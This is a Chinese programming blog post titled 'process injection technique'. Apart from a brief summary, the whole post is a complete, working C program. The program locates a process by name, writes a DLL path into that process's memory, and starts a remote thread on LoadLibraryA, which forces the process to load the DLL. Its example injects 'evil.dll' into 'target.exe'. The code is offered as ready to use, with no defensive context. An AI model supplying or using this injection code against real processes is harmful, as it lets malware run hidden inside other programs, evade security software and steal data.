进程注入技术

最新推荐文章于 2023-12-13 19:52:14 发布

原创最新推荐文章于 2023-12-13 19:52:14 发布 · 1.2k 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#null #access #dll

编程积累专栏收录该内容

52 篇文章

订阅专栏

本文介绍了一种通过DLL注入技术实现远程进程操作的方法。该技术能够获取指定进程的ID，并将DLL文件注入到目标进程中。示例代码展示了如何使用Windows API函数完成这一过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

//Author: Leng_que //Date: 2009-11-11 0:16:35 #include <stdio.h> #include <Windows.h> #include <Tlhelp32.h> //功能：通过进程名（进程名不区分大小写）得到进程ID号。 DWORD GetProcessIdByName(char *processName) { DWORD dwRet = -1; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 pe32={0}; pe32.dwSize = sizeof(PROCESSENTRY32); Process32First( hSnapshot, &pe32 ); do { if ( strcmpi(pe32.szExeFile, processName) == 0 ) { dwRet = pe32.th32ProcessID; break; } } while ( Process32Next(hSnapshot, &pe32) ); CloseHandle(hSnapshot); return dwRet; } //功能：将完全路径为DllFullName的DLL注入到名为ProcessName的进程中。 bool Inject_L(char* DllFullName, char* ProcessName) { bool ret = false; HANDLE hRemoteProcess=NULL; LPVOID pszLibFileRemote=NULL; HANDLE hRemoteThread=NULL; DWORD len_DllFullName = strlen(DllFullName)+1; DWORD dwRemoteProcessId = GetProcessIdByName(ProcessName); if ( dwRemoteProcessId != -1 ) { hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId); if ( hRemoteProcess != NULL ) { pszLibFileRemote = VirtualAllocEx(hRemoteProcess, NULL, len_DllFullName, MEM_COMMIT, PAGE_READWRITE); if ( pszLibFileRemote != NULL ) { if ( WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID)DllFullName, len_DllFullName, NULL) ) { PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA"); if ( pfnStartAddr != NULL ) { hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL); if ( hRemoteThread != NULL ) { WaitForSingleObject(hRemoteThread, INFINITE); DWORD dwHandle = NULL; if ( GetExitCodeThread(hRemoteThread, &dwHandle) ) { if ( dwHandle != NULL ) { ret = true; } } } } } } } } if ( hRemoteThread != NULL ) { CloseHandle(hRemoteThread); } if ( hRemoteProcess != NULL ) { if ( pszLibFileRemote != NULL ) { VirtualFreeEx(hRemoteProcess, pszLibFileRemote, len_DllFullName, MEM_DECOMMIT); } CloseHandle(hRemoteProcess); } return ret; } //主函数入口 int main(void) { //例如：将D盘根目录下的evil.dll注入到名为target.exe的进程中。 bool ret = Inject_L("D://evil.dll", "target.exe"); if ( ret ) { printf("注入成功！/r/n"); } else { printf("注入失败！/r/n"); } return 0; }